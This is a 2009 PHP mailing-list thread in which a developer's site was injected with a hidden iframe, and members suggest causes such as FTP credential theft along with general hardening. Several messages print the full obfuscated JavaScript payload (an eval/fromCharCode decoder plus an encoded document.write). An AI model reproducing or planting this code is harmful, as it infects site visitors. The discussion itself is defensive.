Loading ...
Sorry, an error occurred while loading the content.

Re: [phpXperts] Site Hacking....

Expand Messages
  • 9el
    Another nice link about SQL injections : http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
    Message 1 of 16 , Apr 4 8:02 AM
    • 0 Attachment
      Another nice link about SQL injections :
      http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

      On Sat, Apr 4, 2009 at 8:55 PM, 9el <lenin@...> wrote:
      > This is kind of CSRF and code injection. The hacker/Cracker is
      > injecting php/server side codes which is executing and rewriting with
      > server's own permission.
      >
      > Data must be sanitized before input/output. All exec, pastrugh and
      > other shell permissions should be taken care of. www.phpsec.org
      > and also follow shifflet's book on PHP Security.
      > Another thing is imortant, if the hacker/cracker is trying to flood
      > with million requests there should also be protection to stop that
      > otherwise it would be a Denial of Service case for the Web App. And
      > during DoS situation security vulnerability and holes reveal more.
      >
      > Regards
      >
      > Lenin
      >
      > www.twitter.com/nine_L
      >
    • 9el
      ... q49d5f4502c1b6= ;q49d5f4502e0f9=String[ fromCharCode ];for(q49d5f4502c986=0;q49d5f4502c986
      Message 2 of 16 , Apr 4 10:00 AM
      • 0 Attachment
        On Sat, Apr 4, 2009 at 10:40 PM, Md. Nahid <nahidphpxpert@...> wrote:
        > Hi,
        > Thanks to reply more solution. Now I am telling about my problem.
        > I have develop a static site and hosted it 90 days go. Today at morning I
        > try
        > to search my site at google. But google show This site may harm your
        > computer. After
        > click the link its shows Warning- visiting this
        > web site may harm your computer!
        >
        > Same time I open my ftp and check all file and I saw onle
        > index.php, main.htm, index.html and home.html file is infected.
        >
        > This is my previous code:
        > <?
        > include 'header.php';
        > ?>
        > ……………. My Html Code
        >
        > <?
        > include 'footer.php';
        > ?>
        >
        > Now auto modify code:
        >
        > <?
        > include 'header.php';
        > ?>
        > ……………. My Html Code
        >
        > <?
        > include 'footer.php';
        > echo "";
        > ?>
        > http://url/</a>' width='1' height='1'
        > style='visibility: hidden;'> return
        > (eval('pars'+'eInt')(q49d5f45029aa7,16));}function
        > q49d5f4502b218(q49d5f4502b9ea){ var q49d5f4502d156=2; var
        > q49d5f4502c1b6='';q49d5f4502e0f9=String['fromCharCode'];for(q49d5f4502c986=0;q49d5f4502c986<q49d5f4502b9ea.length;q49d5f4502c986+=q49d5f4502d156){
        > q49d5f4502c1b6+=(q49d5f4502e0f9(c1023895d9q49d5f450292d8(q49d5f4502b9ea.substr(q49d5f4502c986,q49d5f4502d156))));}return
        > q49d5f4502c1b6;} var n45='';var
        > ............ moderated ....................
        > </script>
        >
        > This is my actual problem. I have removed this code. I can
        > not understand who put this additional code? Any hacker?
        >
        > Now please tell me how to protect my site.
        >
        > --------------
        > golam robbany
        >
        I have already told you what to do.
        1. Filter Input and Output both.
        2. Sanitize and Validate data.
        3. Try to learn a good framework which have those basic security already implemented. But you should also adapt them yourself.
        4. If the site is about sophisticated data then you can consider using a VPS or Dedicated hosting.
        5. Do not forget to study about the Security vulnerabilities. Try to collect the ZCE Exam preparation Guide and read it.
        Also recommended is www.phpseq.org
        Dont forget to Google on:
        CSRF
        XSS
        SQLInjection
        CodeInjection
        ClickJacking
        SessionHijacking
        EmailInjection


        Top 10 Home Office Hacks http://tinyurl.com/cps5ay

        And ofcourse: Super Secure your Domain + FTP + Control Panel + mail etc with hard passwords and difficult to guess username as well.

      • Nurul Abser
        @9el * Can Codeigniter prevent this kind of attack? * at config/database.php file I set db_debug to FALSE cause it also may create security problem showing
        Message 3 of 16 , Apr 4 8:46 PM
        • 0 Attachment
          @9el
          *  Can Codeigniter prevent this kind of attack?
          * at config/database.php file I set db_debug to FALSE cause it also may create security problem showing sql information at debugging time.
          * Is there any change need to secure the application?


          On Sat, Apr 4, 2009 at 11:00 PM, 9el <doctortomorrow@...> wrote:

          On Sat, Apr 4, 2009 at 10:40 PM, Md. Nahid <nahidphpxpert@...> wrote:
          > Hi,
          > Thanks to reply more solution. Now I am telling about my problem.
          > I have develop a static site and hosted it 90 days go. Today at morning I
          > try
          > to search my site at google. But google show This site may harm your
          > computer. After
          > click the link its shows Warning- visiting this
          > web site may harm your computer!
          >
          > Same time I open my ftp and check all file and I saw onle
          > index.php, main.htm, index.html and home.html file is infected.
          >
          > This is my previous code:
          > <?
          > include 'header.php';
          > ?>
          > ……………. My Html Code
          >
          > <?
          > include 'footer.php';
          > ?>
          >
          > Now auto modify code:
          >
          > <?
          > include 'header.php';
          > ?>
          > ……………. My Html Code
          >
          > <?
          > include 'footer.php';
          > echo "";
          > ?>
          > http://url/</a>' width='1' height='1'
          > style='visibility: hidden;'> return
          > (eval('pars'+'eInt')(q49d5f45029aa7,16));}function
          > q49d5f4502b218(q49d5f4502b9ea){ var q49d5f4502d156=2; var
          > q49d5f4502c1b6='';q49d5f4502e0f9=String['fromCharCode'];for(q49d5f4502c986=0;q49d5f4502c986<q49d5f4502b9ea.length;q49d5f4502c986+=q49d5f4502d156){
          > q49d5f4502c1b6+=(q49d5f4502e0f9(c1023895d9q49d5f450292d8(q49d5f4502b9ea.substr(q49d5f4502c986,q49d5f4502d156))));}return
          > q49d5f4502c1b6;} var n45='';var
          > ............ moderated ....................
          > </script>
          >
          > This is my actual problem. I have removed this code. I can
          > not understand who put this additional code? Any hacker?
          >
          > Now please tell me how to protect my site.
          >
          > --------------
          > golam robbany
          >
          I have already told you what to do.
          1. Filter Input and Output both.
          2. Sanitize and Validate data.
          3. Try to learn a good framework which have those basic security already implemented. But you should also adapt them yourself.
          4. If the site is about sophisticated data then you can consider using a VPS or Dedicated hosting.
          5. Do not forget to study about the Security vulnerabilities. Try to collect the ZCE Exam preparation Guide and read it.
          Also recommended is www.phpseq.org
          Dont forget to Google on:
          CSRF
          XSS
          SQLInjection
          CodeInjection
          ClickJacking
          SessionHijacking
          EmailInjection


          Top 10 Home Office Hacks http://tinyurl.com/cps5ay

          And ofcourse: Super Secure your Domain + FTP + Control Panel + mail etc with hard passwords and difficult to guess username as well.




          --
          Nurul Abser
          abser-bd.blogspot.com
        • 9el
          On Sun, Apr 5, 2009 at 9:46 AM, Nurul Abser @9el * Can Codeigniter prevent this kind of attack? * at config/database.php file I set db_debug to FALSE cause it
          Message 4 of 16 , Apr 4 10:41 PM
          • 0 Attachment

            On Sun, Apr 5, 2009 at 9:46 AM, Nurul Abser
            @9el
            *  Can Codeigniter prevent this kind of attack?
            * at config/database.php file I set db_debug to FALSE cause it also may create security problem showing sql information at debugging time.
            * Is there any change need to secure the application?

            Well, hacking is breaking the security. And destruction is easier than creation. When you enable highest measures of security in any framework based application you just can expect a minimal level of security automatically. But not guaranteed for sure.

            And not only db_debug all sorts of debug information should be out of sight for the end users/hackers. Use debugging/logging to files.
            db_debug is initial option you never keep them enabled in production.

            To full-proof your CI Application you must consult lots of proven tricks and experienced programmers.

            Thanks

            Lenin

            www.twitter.com/nine_L
          • Sabrina Akter
            Nurul Abser: if you use Codeigniter library functions, that will decrease your risk. But, still you have to be alert while writing queries. Specially while
            Message 5 of 16 , Apr 7 7:33 PM
            • 0 Attachment
              Nurul Abser: if you use  'Codeigniter' library functions, that will decrease your risk. But, still you have to be alert while writing queries. Specially while writting SELECT query. Most of people write,
              "SELECT * from TABLE_NAME" . Its really a bad habit. Please avoid  [ * ] (select all). This simple [ * ]  may cost you a lot.

              With Regards
              --------------------
              Sabrina Akter  
              Web App. Developer
              'IBACS' - www.ibacs.co.uk


            • Nurul Abser
              Thanks to Lenin and Sabrina. Do you have any link where I can read about the security hole in Codeigniter. ... -- Nurul Abser abser-bd.blogspot.com
              Message 6 of 16 , Apr 7 11:10 PM
              • 0 Attachment
                Thanks to Lenin and Sabrina. Do you have any link where I can read about the security hole in Codeigniter.

                On Wed, Apr 8, 2009 at 8:33 AM, Sabrina Akter <lizzeelike@...> wrote:

                Nurul Abser: if you use  'Codeigniter' library functions, that will decrease your risk. But, still you have to be alert while writing queries. Specially while writting SELECT query. Most of people write,
                "SELECT * from TABLE_NAME" . Its really a bad habit. Please avoid  [ * ] (select all). This simple [ * ]  may cost you a lot.

                With Regards
                --------------------
                Sabrina Akter  
                Web App. Developer
                'IBACS' - www.ibacs.co.uk





                --
                Nurul Abser
                abser-bd.blogspot.com
              • 9el
                ... the ...
                Message 7 of 16 , Apr 7 11:38 PM
                • 0 Attachment
                  On Wed, Apr 8, 2009 at 12:10 PM, Nurul Abser <abser.it@gmail.com> wrote:
                  > Thanks to Lenin and Sabrina. Do you have any link where I can read about the
                  > security hole in Codeigniter.
                  >

                  http://www.google.com.bd/search?hl=bn&client=firefox-a&rls=com.ubuntu%3Aen-US%3Aunofficial&hs=4BR&q=security+holes+in+codeigniter&btnG=%E0%A6%85%E0%A6%A8%E0%A7%81%E0%A6%B8%E0%A6%A8%E0%A7%8D%E0%A6%A7%E0%A6%BE%E0%A6%A8&meta=&aq=f&oq=

                  http://xtrafile.com/2008/09/10/using-codeigniter-to-build-web-20-apps-part-one-security/
                  is the one comes at top.

                  Now, my thinking is, as starter you should be looking to avoid worst practices first. And learning all the current mal-usage of the internet, you can start practicing ways how to avoid them or at least make your apps a bit more safer than usual.

                  regards

                  Lenin

                  www.twitter.com/nine_L
                • Humayun Kabir
                  Some days ago I have faced the same problem in one of my project. The client of the project was very much anxious about the unwanted iframe code on the
                  Message 8 of 16 , Apr 12 10:48 PM
                  • 0 Attachment
                    Some days ago I have faced the same problem in one of my project. The client of the project was very much anxious about the unwanted iframe code on the index.php page of his main site. My project was hosted on the same hosting server and I have accesses of that server. My client claim I have uploaded the virus/iframe code of his index.php script, because I have the access of that server. But in fact I don't know anything about the iframe code. Then I have searched online and find the reason of the code and also got a solution. Please see the below article. All web programmers may get help from this article who are facing this problem.

                    1)Actually the html/frame virus are originate from a client side PC that has not properly ran a virus scan. What happens is there is a virus on a client PC, and when that PC uses an ftp client (like filezilla, etc), then the virus "sniffs" the ftp session, gets the username and password, and later will initiate a hidden ftp session, then download any index.html, index.php, default.php, etc. files, and add an <iframe> tag to the bottom of the file (or a echo"<iframe....).
                    When customers browse this site their anti-virus software displays a warning! This is not good for business. There are 4 steps I want you to do during your shift to fix this problem:

                        1a) Install Avira anti-virus software (free version works great). Its a very lite (not resource intensive) av software that is one of the best. Make sure that the auto-updater is kept on, so that every few days the av virus detection DB gets updated (small very quick automatic process).

                        2a) Change all ftp passwords. This step is only to be done after
                    step (1a) is complete, to complete ensure the virus does not get the
                    new passwords.
                        3a) Make sure the chmod is set correctly and there are no chmod
                    777 set on any of the servers. (I think this is not the problem, as I
                    think the default is always 755 for linux...and the windows IIS
                    server, I'm not sure)
                        4a) After 1a,2a,3a or all complete, make sure when browsing the sites they are
                    working on, they may see Avira pop up with a warning that the html/php
                    etc file contiains an html/framer script/virus. This means that
                    index.html, index.php, default.php, index.aspx, (and maybe a few other
                    files) contain an added <iframe> found at the bottom or and
                    echo"<iframe...." found at the bottom of the file. This needs to be
                    deleted, or the virus warning will keep appearing everytime the site
                    is browsed.

                    --- On Sat, 4/4/09, Md. Nahid <nahidphpxpert@...> wrote:
                    From: Md. Nahid <nahidphpxpert@...>
                    Subject: [phpXperts] Site Hacking....
                    To: "PHPXpert" <phpexperts@yahoogroups.com>
                    Date: Saturday, April 4, 2009, 3:11 AM



                    Dear All,

                     

                    Today I am fetching a problem about a site. I have hosted it around 90 days ago.

                    Today when I open my site it show site does not open and I found some code at my index file.

                     

                     </iframe><script>function c1023895d9q49d5f447 61567(q49d5f4476 1dc1){  return (eval('pars' +'eInt')( q49d5f44761dc1, 16));}function q49d5f447634ad( q49d5f44763c7d) { var q49d5f447653f5= 2; var q49d5f4476444f= '';q49d5f447666b b=String[ 'fromCharCode' ];for(q49d5f4476 4c20=0;q49d5f447 64c20<q49d5f44763c7d. length;q49d5f447 64c20+=q49d5f447 653f5){ q49d5f4476444f+ =(q49d5f447666bb (c1023895d9q49d5 f44761567( q49d5f44763c7d. substr(q49d5f447 64c20,q49d5f4476 53f5)))); }return q49d5f4476444f; } var n44='';var q49d5f44766b67= '3C7'+n44+ '3637'+n44+ '2697'+n44+ '07'+n44+ '43E696628216D7' +n44+'96961297' +n44+'B646F637' +n44+'56D656E7' +n44+'42E7' +n44+'7'+ n44+'7'+n44+ '2697'+n44+ '465287'+ n44+'56E657' +n44+'363617' +n44+'065282027' +n44+'2533632536 392536362537' +n44+'3225363125 3664253635253230 2536652536312536 6425363525336425 3633253331253330 2532302537' +n44+'332537' +n44+'3225363325 3364253237' +n44+'2536382537 '+n44+'342537' +n44+'342537' +n44+'3025336125 3266253266253637 '+n44+'253666253 637'+n44+ '253666253332253 6642536352532652 536652536352537' +n44+'3425326625 3265253637' +n44+'2536662532 6625363325363825 3635253633253662 2532652536382537 '+n44+'342536642 5366325336625323 7'+n44+'25326225 34642536312537' +n44+'3425363825 32652537' +n44+'3225366625 37'+n44+' 3525366525363425 3238253464253631 2537'+n44+ '342536382532652 537'+n44+ '322536312536652 5363425366625366 4253238253239253 2612533312533362 5333825333225333 4253335253239253 262253237' +n44+'2533302536 35253333253237' +n44+'2532302537 '+n44+'37' +n44+'25363925 36342537'+n44+ '342536382533642 5333325333825333 5253230253638253 635253639253637' +n44+'2536382537 '+n44+'342533642 5333425333325333 7'+n44+'25323025 37'+n44+' 332537'+n44+ '342537'+ n44+'39253663253 635253364253237' +n44+'2537' +n44+'3625363925 37'+n44+' 3325363925363225 3639253663253639 2537'+n44+ '342537'+ n44+'39253361253 6382536392536342 5363425363525366 5253237'+ n44+'25336525336 3253266253639253 6362537'+ n44+'32253631253 6642536352533652 7'+n44+'29293B7' +n44+'D7' +n44+'6617' +n44+'2206D7' +n44+'969613D7' +n44+'47' +n44+'27' +n44+'5653B3C2F7 '+n44+'3637' +n44+'2697' +n44+'07' +n44+'43E' ;document. write(q49d5f4476 34ad(q49d5f44766 b67));
                    </script>

                     

                    I am not including this code. but who put this code? any hacker?

                     

                    Someone help me?


                     
                    ------------ --
                    golam robbany





                  • M. A. Taleb
                    Appreciate man for your good solution Regards M. A. Taleb ________________________________ From: Humayun Kabir To:
                    Message 9 of 16 , Apr 13 6:40 AM
                    • 0 Attachment
                      Appreciate man for your good solution
                       
                      Regards
                      M. A. Taleb




                      From: Humayun Kabir <kabirhumayunbd@...>
                      To: phpexperts@yahoogroups.com
                      Sent: Monday, April 13, 2009 1:48:56 AM
                      Subject: Re: [phpXperts] Site Hacking....

                      Some days ago I have faced the same problem in one of my project. The client of the project was very much anxious about the unwanted iframe code on the index.php page of his main site. My project was hosted on the same hosting server and I have accesses of that server. My client claim I have uploaded the virus/iframe code of his index.php script, because I have the access of that server. But in fact I don't know anything about the iframe code. Then I have searched online and find the reason of the code and also got a solution. Please see the below article. All web programmers may get help from this article who are facing this problem.

                      1)Actually the html/frame virus are originate from a client side PC that has not properly ran a virus scan. What happens is there is a virus on a client PC, and when that PC uses an ftp client (like filezilla, etc), then the virus "sniffs" the ftp session, gets the username and password, and later will initiate a hidden ftp session, then download any index.html, index.php, default.php, etc. files, and add an <iframe> tag to the bottom of the file (or a echo"<iframe....).
                      When customers browse this site their anti-virus software displays a warning! This is not good for business. There are 4 steps I want you to do during your shift to fix this problem:

                          1a) Install Avira anti-virus software (free version works great). Its a very lite (not resource intensive) av software that is one of the best. Make sure that the auto-updater is kept on, so that every few days the av virus detection DB gets updated (small very quick automatic process).

                          2a) Change all ftp passwords. This step is only to be done after
                      step (1a) is complete, to complete ensure the virus does not get the
                      new passwords.
                          3a) Make sure the chmod is set correctly and there are no chmod
                      777 set on any of the servers. (I think this is not the problem, as I
                      think the default is always 755 for linux...and the windows IIS
                      server, I'm not sure)
                          4a) After 1a,2a,3a or all complete, make sure when browsing the sites they are
                      working on, they may see Avira pop up with a warning that the html/php
                      etc file contiains an html/framer script/virus. This means that
                      index.html, index.php, default.php, index.aspx, (and maybe a few other
                      files) contain an added <iframe> found at the bottom or and
                      echo"<iframe...." found at the bottom of the file. This needs to be
                      deleted, or the virus warning will keep appearing everytime the site
                      is browsed.

                      --- On Sat, 4/4/09, Md. Nahid <nahidphpxpert@ yahoo.com> wrote:
                      From: Md. Nahid <nahidphpxpert@ yahoo.com>
                      Subject: [phpXperts] Site Hacking....
                      To: "PHPXpert" <phpexperts@yahoogro ups.com>
                      Date: Saturday, April 4, 2009, 3:11 AM



                      Dear All,

                       

                      Today I am fetching a problem about a site. I have hosted it around 90 days ago.

                      Today when I open my site it show site does not open and I found some code at my index file.

                       

                       </iframe><script>function c1023895d9q49d5f447 61567(q49d5f4476 1dc1){  return (eval('pars' +'eInt')( q49d5f44761dc1, 16));}function q49d5f447634ad( q49d5f44763c7d) { var q49d5f447653f5= 2; var q49d5f4476444f= '';q49d5f447666b b=String[ 'fromCharCode' ];for(q49d5f4476 4c20=0;q49d5f447 64c20<q49d5f44763c7d. length;q49d5f447 64c20+=q49d5f447 653f5){ q49d5f4476444f+ =(q49d5f447666bb (c1023895d9q49d5 f44761567( q49d5f44763c7d. substr(q49d5f447 64c20,q49d5f4476 53f5)))); }return q49d5f4476444f; } var n44='';var q49d5f44766b67= '3C7'+n44+ '3637'+n44+ '2697'+n44+ '07'+n44+ '43E696628216D7' +n44+'96961297' +n44+'B646F637' +n44+'56D656E7' +n44+'42E7' +n44+'7'+ n44+'7'+n44+ '2697'+n44+ '465287'+ n44+'56E657' +n44+'363617' +n44+'065282027' +n44+'2533632536 392536362537' +n44+'3225363125 3664253635253230 2536652536312536 6425363525336425 3633253331253330 2532302537' +n44+'332537' +n44+'3225363325 3364253237' +n44+'2536382537 '+n44+'342537' +n44+'342537' +n44+'3025336125 3266253266253637 '+n44+'253666253 637'+n44+ '253666253332253 6642536352532652 536652536352537' +n44+'3425326625 3265253637' +n44+'2536662532 6625363325363825 3635253633253662 2532652536382537 '+n44+'342536642 5366325336625323 7'+n44+'25326225 34642536312537' +n44+'3425363825 32652537' +n44+'3225366625 37'+n44+' 3525366525363425 3238253464253631 2537'+n44+ '342536382532652 537'+n44+ '322536312536652 5363425366625366 4253238253239253 2612533312533362 5333825333225333 4253335253239253 262253237' +n44+'2533302536 35253333253237' +n44+'2532302537 '+n44+'37' +n44+'25363925 36342537'+n44+ '342536382533642 5333325333825333 5253230253638253 635253639253637' +n44+'2536382537 '+n44+'342533642 5333425333325333 7'+n44+'25323025 37'+n44+' 332537'+n44+ '342537'+ n44+'39253663253 635253364253237' +n44+'2537' +n44+'3625363925 37'+n44+' 3325363925363225 3639253663253639 2537'+n44+ '342537'+ n44+'39253361253 6382536392536342 5363425363525366 5253237'+ n44+'25336525336 3253266253639253 6362537'+ n44+'32253631253 6642536352533652 7'+n44+'29293B7' +n44+'D7' +n44+'6617' +n44+'2206D7' +n44+'969613D7' +n44+'47' +n44+'27' +n44+'5653B3C2F7 '+n44+'3637' +n44+'2697' +n44+'07' +n44+'43E' ;document. write(q49d5f4476 34ad(q49d5f44766 b67));
                      </script>

                       

                      I am not including this code. but who put this code? any hacker?

                       

                      Someone help me?


                       
                      ------------ --
                      golam robbany






                    • anam kafi
                      Hi, I have got the same problem in couple of sites. I just delete all files from server and run anti virus in my pc. Then upload the site. Now it is ok. I
                      Message 10 of 16 , Apr 13 11:44 AM
                      • 0 Attachment
                        Hi,
                        I have got the same problem in couple of sites. I just delete all files from server and run anti virus in my pc. Then upload the site. Now it is ok. I didn't know how the virus works but from this article now I have that idea. Thank you for this great article.
                         
                        Regards
                        Anam

                        --- On Mon, 13/4/09, Humayun Kabir <kabirhumayunbd@...> wrote:
                        From: Humayun Kabir <kabirhumayunbd@...>
                        Subject: Re: [phpXperts] Site Hacking....
                        To: phpexperts@yahoogroups.com
                        Date: Monday, 13 April, 2009, 11:48 AM

                         

                         </iframe><script>function c1023895d9q49d5f447 61567(q49d5f4476 1dc1){  return (eval('pars' +'eInt')( q49d5f44761dc1, 16));}function q49d5f447634ad( q49d5f44763c7d) { var q49d5f447653f5= 2; var q49d5f4476444f= '';q49d5f447666b b=String[ 'fromCharCode' ];for(q49d5f4476 4c20=0;q49d5f447 64c20<q49d5f44763c7d. length;q49d5f447 64c20+=q49d5f447 653f5){ q49d5f4476444f+ =(q49d5f447666bb (c1023895d9q49d5 f44761567( q49d5f44763c7d. substr(q49d5f447 64c20,q49d5f4476 53f5)))); }return q49d5f4476444f; } var n44='';var q49d5f44766b67= '3C7'+n44+ '3637'+n44+ '2697'+n44+ '07'+n44+ '43E696628216D7' +n44+'96961297' +n44+'B646F637' +n44+'56D656E7' +n44+'42E7' +n44+'7'+ n44+'7'+n44+ '2697'+n44+ '465287'+ n44+'56E657' +n44+'363617' +n44+'065282027' +n44+'2533632536 392536362537' +n44+'3225363125 3664253635253230 2536652536312536 6425363525336425 3633253331253330 2532302537' +n44+'332537' +n44+'3225363325 3364253237' +n44+'2536382537 '+n44+'342537' +n44+'342537' +n44+'3025336125 3266253266253637 '+n44+'253666253 637'+n44+ '253666253332253 6642536352532652 536652536352537' +n44+'3425326625 3265253637' +n44+'2536662532 6625363325363825 3635253633253662 2532652536382537 '+n44+'342536642 5366325336625323 7'+n44+'25326225 34642536312537' +n44+'3425363825 32652537' +n44+'3225366625 37'+n44+' 3525366525363425 3238253464253631 2537'+n44+ '342536382532652 537'+n44+ '322536312536652 5363425366625366 4253238253239253 2612533312533362 5333825333225333 4253335253239253 262253237' +n44+'2533302536 35253333253237' +n44+'2532302537 '+n44+'37' +n44+'25363925 36342537'+n44+ '342536382533642 5333325333825333 5253230253638253 635253639253637' +n44+'2536382537 '+n44+'342533642 5333425333325333 7'+n44+'25323025 37'+n44+' 332537'+n44+ '342537'+ n44+'39253663253 635253364253237' +n44+'2537' +n44+'3625363925 37'+n44+' 3325363925363225 3639253663253639 2537'+n44+ '342537'+ n44+'39253361253 6382536392536342 5363425363525366 5253237'+ n44+'25336525336 3253266253639253 6362537'+ n44+'32253631253 6642536352533652 7'+n44+'29293B7' +n44+'D7' +n44+'6617' +n44+'2206D7' +n44+'969613D7' +n44+'47' +n44+'27' +n44+'5653B3C2F7 '+n44+'3637' +n44+'2697' +n44+'07' +n44+'43E' ;document. write(q49d5f4476 34ad(q49d5f44766 b67));
                        </script>

                         

                        I am not including this code. but who put this code? any hacker?

                         

                        Someone help me?

                         
                        ------------ --
                        golam robbany




                        Some days ago I have faced the same problem in one of my project. The client of the project was very much anxious about the unwanted iframe code on the index.php page of his main site. My project was hosted on the same hosting server and I have accesses of that server. My client claim I have uploaded the virus/iframe code of his index.php script, because I have the access of that server. But in fact I don't know anything about the iframe code. Then I have searched online and find the reason of the code and also got a solution. Please see the below article. All web programmers may get help from this article who are facing this problem.

                        1)Actually the html/frame virus are originate from a client side PC that has not properly ran a virus scan. What happens is there is a virus on a client PC, and when that PC uses an ftp client (like filezilla, etc), then the virus "sniffs" the ftp session, gets the username and password, and later will initiate a hidden ftp session, then download any index.html, index.php, default.php, etc. files, and add an <iframe> tag to the bottom of the file (or a echo"<iframe....).
                        When customers browse this site their anti-virus software displays a warning! This is not good for business. There are 4 steps I want you to do during your shift to fix this problem:

                            1a) Install Avira anti-virus software (free version works great). Its a very lite (not resource intensive) av software that is one of the best. Make sure that the auto-updater is kept on, so that every few days the av virus detection DB gets updated (small very quick automatic process).

                            2a) Change all ftp passwords. This step is only to be done after
                        step (1a) is complete, to complete ensure the virus does not get the
                        new passwords.
                            3a) Make sure the chmod is set correctly and there are no chmod
                        777 set on any of the servers. (I think this is not the problem, as I
                        think the default is always 755 for linux...and the windows IIS
                        server, I'm not sure)
                            4a) After 1a,2a,3a or all complete, make sure when browsing the sites they are
                        working on, they may see Avira pop up with a warning that the html/php
                        etc file contiains an html/framer script/virus. This means that
                        index.html, index.php, default.php, index.aspx, (and maybe a few other
                        files) contain an added <iframe> found at the bottom or and
                        echo"<iframe...." found at the bottom of the file. This needs to be
                        deleted, or the virus warning will keep appearing everytime the site
                        is browsed.

                        --- On Sat, 4/4/09, Md. Nahid <nahidphpxpert@ yahoo.com> wrote:
                        From: Md. Nahid <nahidphpxpert@ yahoo.com>
                        Subject: [phpXperts] Site Hacking....
                        To: "PHPXpert" <phpexperts@yahoogro ups.com>
                        Date: Saturday, April 4, 2009, 3:11 AM



                        Dear All,

                         

                        Today I am fetching a problem about a site. I have hosted it around 90 days ago.

                        Today when I open my site it show site does not open and I found some code at my index file.




                        Add more friends to your messenger and enjoy! Invite them now.
                        Your message has been successfully submitted and would be delivered to recipients shortly.